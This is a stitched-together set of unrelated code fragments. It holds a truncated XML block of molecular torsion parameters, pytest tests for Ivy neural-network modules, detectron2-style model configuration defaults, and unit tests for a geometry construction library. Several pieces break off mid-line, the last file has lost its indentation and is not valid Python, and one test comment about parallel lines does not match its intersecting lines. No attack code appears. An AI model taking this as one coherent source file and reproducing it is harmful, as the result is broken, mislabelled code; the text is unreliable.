<Proper type1="C136" type2="C136" type3="C246" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C246" type4="N239" k1="-4.35136" k2="-1.3598" k3="1.21336" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C267" type4="O268" k1="2.092" k2="1.142232" k3="0.9414" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C267" type4="O269" k1="0" k2="1.142232" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C283" type4="C271" k1="-4.932936" k2="1.905812" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C283" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C283" type4="N238" k1="1.849328" k2="1.876524" k3="1.84096" k4="0.0" periodicity1="1" | |
<gh_stars>0
"""
Collection of tests for Ivy modules
"""
# global
import pytest
import numpy as np
# local
import ivy
import ivy_tests.helpers as helpers
class TrainableModule(ivy.Module):
    """Three-layer tanh MLP used by the module-training tests."""

    def __init__(self, in_size, out_size, dev=None, hidden_size=64, v=None, with_partial_v=False):
        # Attribute names drive the variable-container keys (linear0/1/2)
        # that the tests index into, so they must stay as-is.
        self._linear0 = ivy.Linear(in_size, hidden_size, dev=dev)
        self._linear1 = ivy.Linear(hidden_size, hidden_size, dev=dev)
        self._linear2 = ivy.Linear(hidden_size, out_size, dev=dev)
        ivy.Module.__init__(self, dev, v=v, with_partial_v=with_partial_v)

    def _forward(self, x):
        activation = ivy.expand_dims(x, 0)
        for layer in (self._linear0, self._linear1, self._linear2):
            activation = ivy.tanh(layer(activation))
        return activation[0]
# module training
@pytest.mark.parametrize(
    "bs_ic_oc", [([1, 2], 4, 5)])
def test_module_training(bs_ic_oc, dev, compile_graph, call):
    """Train a small MLP for ten GD steps and check the loss strictly decreases."""
    # smoke test
    if call is helpers.np_call:
        # NumPy does not support gradients
        pytest.skip()
    batch_shape, input_channels, output_channels = bs_ic_oc
    inputs = ivy.cast(
        ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), input_channels),
        'float32')
    model = TrainableModule(input_channels, output_channels, dev=dev)
    # compile if this mode is set
    if compile_graph and call is helpers.torch_call:
        # Currently only PyTorch is supported for ivy compilation
        model.compile_graph(inputs)

    def objective(v_):
        return ivy.reduce_mean(model(inputs, v=v_))[0]

    # train: every step must strictly reduce the loss
    previous_loss = 1e12
    loss = None
    grads = None
    for _ in range(10):
        loss, grads = ivy.execute_with_gradients(objective, model.v)
        model.v = ivy.gradient_descent_update(model.v, grads, 1e-3)
        assert loss < previous_loss
        previous_loss = loss
    # type test
    assert ivy.is_array(loss)
    assert isinstance(grads, ivy.Container)
    # cardinality test
    if call is helpers.mx_call:
        # mxnet slicing cannot reduce dimension to zero
        assert loss.shape == (1,)
    else:
        assert loss.shape == ()
    # value test: every layer received a non-zero gradient
    for layer_grads in (grads.linear0, grads.linear1, grads.linear2):
        assert ivy.reduce_max(ivy.abs(layer_grads.b)) > 0
        assert ivy.reduce_max(ivy.abs(layer_grads.w)) > 0
    # compilation test
    if call is helpers.torch_call:
        # pytest scripting does not support **kwargs
        return
    if not ivy.wrapped_mode():
        helpers.assert_compilable(objective)
class TrainableModuleWithList(ivy.Module):
    """MLP whose layers are stored in a plain Python list attribute."""

    def __init__(self, in_size, out_size, dev=None, hidden_size=64):
        # ivy.Module tracks variables of layers held inside list attributes
        self._layers = [
            ivy.Linear(in_size, hidden_size, dev=dev),
            ivy.Linear(hidden_size, hidden_size, dev=dev),
            ivy.Linear(hidden_size, out_size, dev=dev),
        ]
        ivy.Module.__init__(self, dev)

    def _forward(self, x):
        """Apply each list-held layer with tanh (with a temp batch dim)."""
        out = ivy.expand_dims(x, 0)
        for layer in self._layers:
            out = ivy.tanh(layer(out))
        return out[0]
# module with list training
@pytest.mark.parametrize(
    "bs_ic_oc", [([1, 2], 4, 5)])
def test_module_w_list_training(bs_ic_oc, dev, compile_graph, call):
    """Train a module with list-held layers; grads keyed layers.v0/v1/v2."""
    # smoke test
    if call is helpers.np_call:
        # NumPy does not support gradients
        pytest.skip()
    batch_shape, input_channels, output_channels = bs_ic_oc
    x = ivy.cast(ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), input_channels), 'float32')
    module = TrainableModuleWithList(input_channels, output_channels, dev=dev)
    # compile if this mode is set
    if compile_graph and call is helpers.torch_call:
        # Currently only PyTorch is supported for ivy compilation
        module.compile_graph(x)

    def loss_fn(v_):
        return ivy.reduce_mean(module(x, v=v_))[0]

    # train, asserting the loss shrinks monotonically
    previous_loss = 1e12
    loss = grads = None
    for _ in range(10):
        loss, grads = ivy.execute_with_gradients(loss_fn, module.v)
        module.v = ivy.gradient_descent_update(module.v, grads, 1e-3)
        assert loss < previous_loss
        previous_loss = loss
    # type test
    assert ivy.is_array(loss)
    assert isinstance(grads, ivy.Container)
    # cardinality test
    if call is helpers.mx_call:
        # mxnet slicing cannot reduce dimension to zero
        assert loss.shape == (1,)
    else:
        assert loss.shape == ()
    # value test: list layers are exposed as layers.v0/v1/v2 in the grads
    assert ivy.reduce_max(ivy.abs(grads.layers.v0.b)) > 0
    assert ivy.reduce_max(ivy.abs(grads.layers.v0.w)) > 0
    assert ivy.reduce_max(ivy.abs(grads.layers.v1.b)) > 0
    assert ivy.reduce_max(ivy.abs(grads.layers.v1.w)) > 0
    assert ivy.reduce_max(ivy.abs(grads.layers.v2.b)) > 0
    assert ivy.reduce_max(ivy.abs(grads.layers.v2.w)) > 0
    # compilation test
    if call is helpers.torch_call:
        # pytest scripting does not support **kwargs
        return
    if not ivy.wrapped_mode():
        helpers.assert_compilable(loss_fn)
# module with partial v
@pytest.mark.parametrize(
    "bs_ic_oc", [([1, 2], 4, 5)])
def test_module_w_partial_v(bs_ic_oc, dev, compile_graph, call):
    """Check ivy.Module validation of partial / invalid variable containers.

    A container with an unexpected extra variable must be rejected even when
    with_partial_v=True; a partial container must be rejected unless
    with_partial_v=True is passed.
    """
    # smoke test
    if call is helpers.np_call:
        # NumPy does not support gradients
        pytest.skip()
    if call is helpers.mx_call:
        # MXNet ivy.Container repr currently does not work
        pytest.skip()
    batch_shape, input_channels, output_channels = bs_ic_oc
    x = ivy.cast(ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), input_channels), 'float32')
    # full container, but with a spurious 'extra' variable under linear1
    v = ivy.Container({
        'linear0': {
            'b': ivy.variable(ivy.random_uniform(shape=[64])),
            'w': ivy.variable(ivy.random_uniform(shape=[64, 4]))
        },
        'linear1': {
            'b': ivy.variable(ivy.random_uniform(shape=[64])),
            'w': ivy.variable(ivy.random_uniform(shape=[64, 64])),
            'extra': ivy.variable(ivy.random_uniform(shape=[64, 64]))
        },
        'linear2': {
            'b': ivy.variable(ivy.random_uniform(shape=[5])),
            'w': ivy.variable(ivy.random_uniform(shape=[5, 64]))
        }
    })
    # pytest.raises replaces the original try/raise/except pattern (whose
    # failure message also contained a typo: "desipite")
    with pytest.raises(AssertionError):
        TrainableModule(input_channels, output_channels, dev=dev, v=v, with_partial_v=True)
    # genuinely partial container: only some variables provided per layer
    v = ivy.Container({
        'linear0': {
            'b': ivy.variable(ivy.random_uniform(shape=[64])),
        },
        'linear1': {
            'w': ivy.variable(ivy.random_uniform(shape=[64, 64]))
        },
        'linear2': {
            'b': ivy.variable(ivy.random_uniform(shape=[5]))
        }
    })
    # partial v must be rejected without with_partial_v=True ...
    with pytest.raises(AssertionError):
        TrainableModule(input_channels, output_channels, dev=dev, v=v)
    # ... and accepted with it
    module = TrainableModule(input_channels, output_channels, dev=dev, v=v, with_partial_v=True)
    # compile if this mode is set
    if compile_graph and call is helpers.torch_call:
        # Currently only PyTorch is supported for ivy compilation
        module.compile_graph(x)
    module(x)
class ModuleWithNoneAttribute(ivy.Module):
    """Module holding a None attribute, to check ivy.Module tolerates it."""

    def __init__(self, dev=None, hidden_size=64):
        # deliberately None: ivy.Module's attribute scan must skip it
        self.some_attribute = None
        ivy.Module.__init__(self, dev)

    def _forward(self, x):
        # identity forward pass
        return x
# module with none attribute
@pytest.mark.parametrize(
    "bs_ic_oc", [([1, 2], 4, 5)])
def test_module_w_none_attribute(bs_ic_oc, dev, compile_graph, call):
    """A module with a None attribute must construct and run without error."""
    # smoke test
    if call is helpers.np_call:
        # NumPy does not support gradients
        pytest.skip()
    batch_shape, input_channels, output_channels = bs_ic_oc
    x = ivy.cast(ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), input_channels), 'float32')
    module = ModuleWithNoneAttribute(dev=dev)
    # compile if this mode is set
    if compile_graph and call is helpers.torch_call:
        # Currently only PyTorch is supported for ivy compilation
        module.compile_graph(x)
    module(x)
class TrainableModuleWithDuplicate(ivy.Module):
    """Two chained linear layers that may share weights (and the same instance)."""

    def __init__(self, channels, same_layer, dev=None):
        if same_layer:
            # both attributes point at the very same layer instance
            shared = ivy.Linear(channels, channels, dev=dev)
            self._linear0 = shared
            self._linear1 = shared
        else:
            # distinct layers sharing one weight matrix but separate biases
            w = ivy.variable(ivy.ones((channels, channels)))
            b0 = ivy.variable(ivy.ones((channels,)))
            b1 = ivy.variable(ivy.ones((channels,)))
            self._linear0 = ivy.Linear(channels, channels, dev=dev, v=ivy.Container({'w': w, 'b': b0}))
            self._linear1 = ivy.Linear(channels, channels, dev=dev, v=ivy.Container({'w': w, 'b': b1}))
        ivy.Module.__init__(self)

    def _forward(self, x):
        """Pass x through linear0 then linear1."""
        return self._linear1(self._linear0(x))
# module training with duplicate
@pytest.mark.parametrize(
    "bs_c", [([1, 2], 64)])
@pytest.mark.parametrize(
    "same_layer", [True, False])
def test_module_training_with_duplicate(bs_c, same_layer, dev, compile_graph, call):
    """Train a module with duplicated/shared layers and check its gradients."""
    # smoke test
    if call is helpers.np_call:
        # NumPy does not support gradients
        pytest.skip()
    batch_shape, channels = bs_c
    x = ivy.cast(ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), channels), 'float32')
    module = TrainableModuleWithDuplicate(channels, same_layer, dev=dev)
    # compile if this mode is set
    if compile_graph and call is helpers.torch_call:
        # Currently only PyTorch is supported for ivy compilation
        module.compile_graph(x)

    def loss_fn(v_):
        return ivy.reduce_mean(module(x, v=v_))[0]

    # train, asserting the loss shrinks monotonically
    previous_loss = 1e12
    loss = grads = None
    for _ in range(10):
        loss, grads = ivy.execute_with_gradients(loss_fn, module.v)
        module.v = ivy.gradient_descent_update(module.v, grads, 1e-3)
        assert loss < previous_loss
        previous_loss = loss
    # type test
    assert ivy.is_array(loss)
    assert isinstance(grads, ivy.Container)
    # cardinality test
    if call is helpers.mx_call:
        # mxnet slicing cannot reduce dimension to zero
        assert loss.shape == (1,)
    else:
        assert loss.shape == ()
    # value test
    assert ivy.reduce_max(ivy.abs(grads.linear0.b)) > 0
    assert ivy.reduce_max(ivy.abs(grads.linear0.w)) > 0
    if not same_layer:
        # shared-instance case has no independent linear1 gradients
        assert ivy.reduce_max(ivy.abs(grads.linear1.b)) > 0
    # compilation test
    if call is helpers.torch_call:
        # pytest scripting does not support **kwargs
        return
    if not ivy.wrapped_mode():
        helpers.assert_compilable(loss_fn)
class TrainableModuleWithDict(ivy.Module):
    """MLP whose layers are stored in a plain Python dict attribute."""

    def __init__(self, in_size, out_size, dev=None, hidden_size=64):
        # ivy.Module tracks variables of layers held inside dict attributes
        self._layers = {
            'linear0': ivy.Linear(in_size, hidden_size, dev=dev),
            'linear1': ivy.Linear(hidden_size, hidden_size, dev=dev),
            'linear2': ivy.Linear(hidden_size, out_size, dev=dev),
        }
        ivy.Module.__init__(self, dev)

    def _forward(self, x):
        """Apply the dict-held layers in order with tanh (with a temp batch dim)."""
        out = ivy.expand_dims(x, 0)
        for key in ('linear0', 'linear1', 'linear2'):
            out = ivy.tanh(self._layers[key](out))
        return out[0]
# module with dict training
@pytest.mark.parametrize(
    "bs_ic_oc", [([1, 2], 4, 5)])
def test_module_w_dict_training(bs_ic_oc, dev, compile_graph, call):
    """Train a module with dict-held layers; grads keyed layers.linearN."""
    # smoke test
    if call is helpers.np_call:
        # NumPy does not support gradients
        pytest.skip()
    batch_shape, input_channels, output_channels = bs_ic_oc
    x = ivy.cast(ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), input_channels), 'float32')
    module = TrainableModuleWithDict(input_channels, output_channels, dev=dev)
    # compile if this mode is set
    if compile_graph and call is helpers.torch_call:
        # Currently only PyTorch is supported for ivy compilation
        module.compile_graph(x)

    def loss_fn(v_):
        return ivy.reduce_mean(module(x, v=v_))[0]

    # train, asserting the loss shrinks monotonically
    previous_loss = 1e12
    loss = grads = None
    for _ in range(10):
        loss, grads = ivy.execute_with_gradients(loss_fn, module.v)
        module.v = ivy.gradient_descent_update(module.v, grads, 1e-3)
        assert loss < previous_loss
        previous_loss = loss
    # type test
    assert ivy.is_array(loss)
    assert isinstance(grads, ivy.Container)
    # cardinality test
    if call is helpers.mx_call:
        # mxnet slicing cannot reduce dimension to zero
        assert loss.shape == (1,)
    else:
        assert loss.shape == ()
    # value test: dict layers are exposed under their dict keys in the grads
    assert ivy.reduce_max(ivy.abs(grads.layers.linear0.b)) > 0
    assert ivy.reduce_max(ivy.abs(grads.layers.linear0.w)) > 0
    assert ivy.reduce_max(ivy.abs(grads.layers.linear1.b)) > 0
    assert ivy.reduce_max(ivy.abs(grads.layers.linear1.w)) > 0
    assert ivy.reduce_max(ivy.abs(grads.layers.linear2.b)) > 0
    assert ivy.reduce_max(ivy.abs(grads.layers.linear2.w)) > 0
    # compilation test
    if call is helpers.torch_call:
        # pytest scripting does not support **kwargs
        return
    if not ivy.wrapped_mode():
        helpers.assert_compilable(loss_fn)
class WithCustomVarStructure(ivy.Module):
    """Module overriding _create_variables to expose a custom x/y/z layout."""

    def __init__(self, in_size, out_size, dev=None, hidden_size=64):
        shapes = [(in_size, hidden_size), (hidden_size, hidden_size), (hidden_size, out_size)]
        self._linear0, self._linear1, self._linear2 = [
            ivy.Linear(n_in, n_out, dev=dev) for n_in, n_out in shapes]
        ivy.Module.__init__(self, dev)

    def _create_variables(self, dev):
        # re-key the three layers' variable containers under x, y and z
        return ivy.Container(x=self._linear0.v, y=self._linear1.v, z=self._linear2.v)

    def _forward(self, x):
        # forward pass unused by the test; only the variable structure matters
        pass
# with custom var structure
@pytest.mark.parametrize(
    "bs_ic_oc", [([1, 2], 4, 5)])
def test_with_custom_var_structure(bs_ic_oc, dev, call):
    """Custom _create_variables keys must appear in the module's container."""
    # smoke test
    if call is helpers.np_call:
        # NumPy does not support gradients
        pytest.skip()
    batch_shape, input_channels, output_channels = bs_ic_oc
    module = WithCustomVarStructure(input_channels, output_channels, dev=dev)
    for key in ('x', 'y', 'z'):
        assert key in module.v
class DoubleLinear(ivy.Module):
def | |
<gh_stars>1-10
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .config import CfgNode as CN
# -----------------------------------------------------------------------------
# Convention about Training / Test specific parameters
# -----------------------------------------------------------------------------
# Whenever an argument can be either used for training or for testing, the
# corresponding name will be post-fixed by a _TRAIN for a training parameter,
# or _TEST for a test-specific parameter.
# For example, the number of images during training will be
# IMAGES_PER_BATCH_TRAIN, while the number of images for testing will be
# IMAGES_PER_BATCH_TEST
# -----------------------------------------------------------------------------
# Config definition
# -----------------------------------------------------------------------------
_C = CN()
# The version number, to upgrade from old configs to new ones if any
# changes happen. It's recommended to keep a VERSION in your config file.
_C.VERSION = 2
_C.MODEL = CN()
_C.MODEL.LOAD_PROPOSALS = False
_C.MODEL.MASK_ON = False
_C.MODEL.KEYPOINT_ON = False
_C.MODEL.DEVICE = "cuda"
_C.MODEL.META_ARCHITECTURE = "GeneralizedRCNN"
# Path (a file path, or URL like detectron2://.., https://..) to a checkpoint file
# to be loaded to the model. You can find available models in the model zoo.
_C.MODEL.WEIGHTS = ""
# Values to be used for image normalization (BGR order, since INPUT.FORMAT defaults to BGR).
# To train on images of different number of channels, just set different mean & std.
# Default values are the mean pixel value from ImageNet: [103.53, 116.28, 123.675]
_C.MODEL.PIXEL_MEAN = [103.530, 116.280, 123.675]
# When using pre-trained models in Detectron1 or any MSRA models,
# std has been absorbed into its conv1 weights, so the std needs to be set 1.
# Otherwise, you can use [57.375, 57.120, 58.395] (ImageNet std)
_C.MODEL.PIXEL_STD = [1.0, 1.0, 1.0]
# -----------------------------------------------------------------------------
# INPUT
# -----------------------------------------------------------------------------
_C.INPUT = CN()
# Size of the smallest side of the image during training
_C.INPUT.MIN_SIZE_TRAIN = (800,)
# Sample size of smallest side by choice or random selection from range given by
# INPUT.MIN_SIZE_TRAIN
_C.INPUT.MIN_SIZE_TRAIN_SAMPLING = "choice"
# Maximum size of the side of the image during training
_C.INPUT.MAX_SIZE_TRAIN = 1333
# Size of the smallest side of the image during testing. Set to zero to disable resize in testing.
_C.INPUT.MIN_SIZE_TEST = 800
# Maximum size of the side of the image during testing
_C.INPUT.MAX_SIZE_TEST = 1333
# `True` if cropping is used for data augmentation during training
_C.INPUT.CROP = CN({"ENABLED": False})
# Cropping type:
# - "relative" crop (H * CROP.SIZE[0], W * CROP.SIZE[1]) part of an input of size (H, W)
# - "relative_range" uniformly sample relative crop size from between [CROP.SIZE[0], CROP.SIZE[1]].
# and [1, 1] and use it as in "relative" scenario.
# - "absolute" crop part of an input with absolute size: (CROP.SIZE[0], CROP.SIZE[1]).
# - "absolute_range", for an input of size (H, W), uniformly sample H_crop in
# [CROP.SIZE[0], min(H, CROP.SIZE[1])] and W_crop in [CROP.SIZE[0], min(W, CROP.SIZE[1])]
_C.INPUT.CROP.TYPE = "relative_range"
# Size of crop in range (0, 1] if CROP.TYPE is "relative" or "relative_range" and in number of
# pixels if CROP.TYPE is "absolute"
_C.INPUT.CROP.SIZE = [0.9, 0.9]
# Whether the model needs RGB, YUV, HSV etc.
# Should be one of the modes defined here, as we use PIL to read the image:
# https://pillow.readthedocs.io/en/stable/handbook/concepts.html#concept-modes
# with BGR being the one exception. One can set image format to BGR, we will
# internally use RGB for conversion and flip the channels over
_C.INPUT.FORMAT = "BGR"
# The ground truth mask format that the model will use.
# Mask R-CNN supports either "polygon" or "bitmask" as ground truth.
_C.INPUT.MASK_FORMAT = "polygon" # alternative: "bitmask"
# -----------------------------------------------------------------------------
# Dataset
# -----------------------------------------------------------------------------
_C.DATASETS = CN()
# List of the dataset names for training. Must be registered in DatasetCatalog
_C.DATASETS.TRAIN = ()
# List of the pre-computed proposal files for training, which must be consistent
# with datasets listed in DATASETS.TRAIN.
_C.DATASETS.PROPOSAL_FILES_TRAIN = ()
# Number of top scoring precomputed proposals to keep for training
_C.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TRAIN = 2000
# List of the dataset names for testing. Must be registered in DatasetCatalog
_C.DATASETS.TEST = ()
# List of the pre-computed proposal files for test, which must be consistent
# with datasets listed in DATASETS.TEST.
_C.DATASETS.PROPOSAL_FILES_TEST = ()
# Number of top scoring precomputed proposals to keep for test
_C.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TEST = 1000
# -----------------------------------------------------------------------------
# DataLoader
# -----------------------------------------------------------------------------
_C.DATALOADER = CN()
# Number of data loading threads
_C.DATALOADER.NUM_WORKERS = 4
# If True, each batch should contain only images for which the aspect ratio
# is compatible. This groups portrait images together, and landscape images
# are not batched with portrait images.
_C.DATALOADER.ASPECT_RATIO_GROUPING = True
# Options: TrainingSampler, RepeatFactorTrainingSampler
_C.DATALOADER.SAMPLER_TRAIN = "TrainingSampler"
# Repeat threshold for RepeatFactorTrainingSampler
_C.DATALOADER.REPEAT_THRESHOLD = 0.0
# If True, when working on datasets that have instance annotations, the
# training dataloader will filter out images without associated annotations
_C.DATALOADER.FILTER_EMPTY_ANNOTATIONS = True
# ---------------------------------------------------------------------------- #
# Backbone options
# ---------------------------------------------------------------------------- #
_C.MODEL.BACKBONE = CN()
_C.MODEL.BACKBONE.NAME = "build_resnet_backbone"
# Freeze the first several stages so they are not trained.
# There are 5 stages in ResNet. The first is a convolution, and the following
# stages are each group of residual blocks.
_C.MODEL.BACKBONE.FREEZE_AT = 2
# ---------------------------------------------------------------------------- #
# FPN options
# ---------------------------------------------------------------------------- #
_C.MODEL.FPN = CN()
# Names of the input feature maps to be used by FPN
# They must have contiguous power of 2 strides
# e.g., ["res2", "res3", "res4", "res5"]
_C.MODEL.FPN.IN_FEATURES = []
_C.MODEL.FPN.OUT_CHANNELS = 256
# Options: "" (no norm), "GN"
_C.MODEL.FPN.NORM = ""
# Types for fusing the FPN top-down and lateral features. Can be either "sum" or "avg"
_C.MODEL.FPN.FUSE_TYPE = "sum"
# ---------------------------------------------------------------------------- #
# Proposal generator options
# ---------------------------------------------------------------------------- #
_C.MODEL.PROPOSAL_GENERATOR = CN()
# Current proposal generators include "RPN", "RRPN" and "PrecomputedProposals"
_C.MODEL.PROPOSAL_GENERATOR.NAME = "RPN"
# Proposal height and width both need to be greater than MIN_SIZE
# (at the scale used during training or inference)
_C.MODEL.PROPOSAL_GENERATOR.MIN_SIZE = 0
# ---------------------------------------------------------------------------- #
# Anchor generator options
# ---------------------------------------------------------------------------- #
_C.MODEL.ANCHOR_GENERATOR = CN()
# The generator can be any name in the ANCHOR_GENERATOR registry
_C.MODEL.ANCHOR_GENERATOR.NAME = "DefaultAnchorGenerator"
# Anchor sizes (i.e. sqrt of area) in absolute pixels w.r.t. the network input.
# Format: list[list[float]]. SIZES[i] specifies the list of sizes
# to use for IN_FEATURES[i]; len(SIZES) == len(IN_FEATURES) must be true,
# or len(SIZES) == 1 is true and size list SIZES[0] is used for all
# IN_FEATURES.
_C.MODEL.ANCHOR_GENERATOR.SIZES = [[32, 64, 128, 256, 512]]
# Anchor aspect ratios. For each area given in `SIZES`, anchors with different aspect
# ratios are generated by an anchor generator.
# Format: list[list[float]]. ASPECT_RATIOS[i] specifies the list of aspect ratios (H/W)
# to use for IN_FEATURES[i]; len(ASPECT_RATIOS) == len(IN_FEATURES) must be true,
# or len(ASPECT_RATIOS) == 1 is true and aspect ratio list ASPECT_RATIOS[0] is used
# for all IN_FEATURES.
_C.MODEL.ANCHOR_GENERATOR.ASPECT_RATIOS = [[0.5, 1.0, 2.0]]
# Anchor angles.
# list[list[float]], the angle in degrees, for each input feature map.
# ANGLES[i] specifies the list of angles for IN_FEATURES[i].
_C.MODEL.ANCHOR_GENERATOR.ANGLES = [[-90, 0, 90]]
# Relative offset between the center of the first anchor and the top-left corner of the image
# Value has to be in [0, 1). Recommend to use 0.5, which means half stride.
# The value is not expected to affect model accuracy.
_C.MODEL.ANCHOR_GENERATOR.OFFSET = 0.0
# ---------------------------------------------------------------------------- #
# RPN options
# ---------------------------------------------------------------------------- #
_C.MODEL.RPN = CN()
_C.MODEL.RPN.HEAD_NAME = "StandardRPNHead" # used by RPN_HEAD_REGISTRY
# Names of the input feature maps to be used by RPN
# e.g., ["p2", "p3", "p4", "p5", "p6"] for FPN
_C.MODEL.RPN.IN_FEATURES = ["res4"]
# Remove RPN anchors that go outside the image by BOUNDARY_THRESH pixels
# Set to -1 or a large value, e.g. 100000, to disable pruning anchors
_C.MODEL.RPN.BOUNDARY_THRESH = -1
# IOU overlap ratios [BG_IOU_THRESHOLD, FG_IOU_THRESHOLD]
# Minimum overlap required between an anchor and ground-truth box for the
# (anchor, gt box) pair to be a positive example (IoU >= FG_IOU_THRESHOLD
# ==> positive RPN example: 1)
# Maximum overlap allowed between an anchor and ground-truth box for the
# (anchor, gt box) pair to be a negative examples (IoU < BG_IOU_THRESHOLD
# ==> negative RPN example: 0)
# Anchors with overlap in between (BG_IOU_THRESHOLD <= IoU < FG_IOU_THRESHOLD)
# are ignored (-1)
_C.MODEL.RPN.IOU_THRESHOLDS = [0.3, 0.7]
_C.MODEL.RPN.IOU_LABELS = [0, -1, 1]
# Number of regions per image used to train RPN
_C.MODEL.RPN.BATCH_SIZE_PER_IMAGE = 256
# Target fraction of foreground (positive) examples per RPN minibatch
_C.MODEL.RPN.POSITIVE_FRACTION = 0.5
# Options are: "smooth_l1", "giou"
_C.MODEL.RPN.BBOX_REG_LOSS_TYPE = "smooth_l1"
_C.MODEL.RPN.BBOX_REG_LOSS_WEIGHT = 1.0
# Weights on (dx, dy, dw, dh) for normalizing RPN anchor regression targets
_C.MODEL.RPN.BBOX_REG_WEIGHTS = (1.0, 1.0, 1.0, 1.0)
# The transition point from L1 to L2 loss. Set to 0.0 to make the loss simply L1.
_C.MODEL.RPN.SMOOTH_L1_BETA = 0.0
_C.MODEL.RPN.LOSS_WEIGHT = 1.0
# Number of top scoring RPN proposals to keep before applying NMS
# When FPN is used, this is *per FPN level* (not total)
_C.MODEL.RPN.PRE_NMS_TOPK_TRAIN = 12000
_C.MODEL.RPN.PRE_NMS_TOPK_TEST = 6000
# Number of top scoring RPN proposals to keep after applying NMS
# When FPN is used, this limit is applied per level and then again to the | |
import copy
from .test_constants import GeometryTestCase
from geompy.core.Construction import Construction
from geompy.core.Point import Point
from geompy.core.Line import Line
from geompy.core.PrebuiltConstructions import BaseConstruction
from geompy.core.Angle import Angle
from geompy.cas import sympify
from copy import deepcopy
class TestConstruction(GeometryTestCase):
def setUp(self) -> None:
self.pointA = Point(0, 0)
self.pointB = Point(1, 0)
self.construction1 = Construction()
self.construction1.add_point(self.pointA)
self.construction1.add_point(self.pointB)
def test_eq_same_construction(self):
construction2 = deepcopy(self.construction1)
self.assertEqual(self.construction1, construction2)
self.assertHashEqual(self.construction1, construction2)
construction2.add_line(self.pointA, self.pointB)
construction2_copy = deepcopy(construction2)
self.assertEqual(construction2, construction2_copy)
self.assertHashEqual(construction2, construction2_copy)
construction3 = deepcopy(self.construction1)
construction3.add_circle(self.pointA, point2=self.pointB)
construction3_copy = deepcopy(construction3)
self.assertEqual(construction3, construction3_copy)
self.assertHashEqual(construction3, construction3_copy)
construction4 = deepcopy(self.construction1)
construction4.add_circle(self.pointB, point2=self.pointA)
construction4_copy = deepcopy(construction4)
self.assertEqual(construction4, construction4_copy)
self.assertHashEqual(construction4, construction4_copy)
def test_eq_conjugate_constructions(self):
# Conjugate constructions are constructions that are simply permutations of each other's steps.
# They yield the same steps and the same points, but generate them in a different order
construction2 = deepcopy(self.construction1)
construction2.add_circle(self.pointA, point2=self.pointB)
construction2.add_circle(self.pointB, point2=self.pointA)
construction3 = deepcopy(self.construction1)
construction3.add_circle(self.pointB, point2=self.pointA)
construction3.add_circle(self.pointA, point2=self.pointB)
self.assertEqual(construction2, construction3)
self.assertHashEqual(construction2, construction3)
construction2.add_line(self.pointA, self.pointB)
construction3.add_line(self.pointB, self.pointA)
self.assertEqual(construction2, construction3)
self.assertHashEqual(construction2, construction3)
def test_len(self):
construction = deepcopy(self.construction1)
self.assertEqual(len(construction), 0)
construction.add_line(self.pointA, self.pointB)
self.assertEqual(len(construction), 1)
# Make sure adding duplicate does not effect length
construction.add_line(self.pointA, self.pointB)
self.assertEqual(len(construction), 1)
# Add second step
construction.add_circle(self.pointA, point2=self.pointB)
self.assertEqual(len(construction), 2)
def test_intersection_line_line_parallel(self):
# two parallel lines should not give any intersections
construction = deepcopy(self.construction1)
line1 = construction.add_line(self.pointA, self.pointB)
point_c = Point(0, 1)
point_d = Point(1, 1)
construction.add_point(point_c)
construction.add_point(point_d)
line2 = construction.add_line(point_c, point_d)
point_e = Point(0, 10)
point_f = Point(1, 10)
construction.add_point(point_e)
construction.add_point(point_f)
line3 = construction.add_line(point_e, point_f)
self.assertEqual(construction.update_intersections_with_object(line1), set())
self.assertEqual(construction.update_intersections_with_object(line2), set())
self.assertEqual(construction.update_intersections_with_object(line3), set())
def test_intersection_line_line_intersecting(self):
# two parallel lines should not give any intersections
construction = deepcopy(self.construction1)
line1 = construction.add_line(self.pointA, self.pointB)
point_c = Point(2, 2)
point_d = Point(1, 1)
construction.add_point(point_c)
construction.add_point(point_d)
line2 = construction.add_line(point_c, point_d)
self.assertEqual(construction.update_intersections_with_object(line2), {Point(0, 0)})
point_e = Point(2, 2)
point_f = Point(3, 1)
construction.add_point(point_e)
construction.add_point(point_f)
line3 = construction.add_line(point_e, point_f)
self.assertEqual(construction.update_intersections_with_object(line3), {Point(2, 2), Point(4, 0)})
def test_intersection_circle_line_no_intersection(self):
construction = self.construction1
circle = construction.add_circle(self.pointA, self.pointB)
point_c = Point(10, 0)
point_d = Point(0, 10)
line = construction.add_line(point_c, point_d)
self.assertEqual(construction.update_intersections_with_object(line), set())
self.assertEqual(construction.update_intersections_with_object(circle), set())
def test_intersection_circle_line_tangent(self):
construction = self.construction1
circle = construction.add_circle(self.pointA, self.pointB)
point_c = Point(0, 1)
point_d = Point(1, 1)
line = construction.add_line(point_c, point_d)
self.assertEqual(construction.update_intersections_with_object(line), {Point(0, 1)})
self.assertEqual(construction.update_intersections_with_object(circle), {Point(0, 1)})
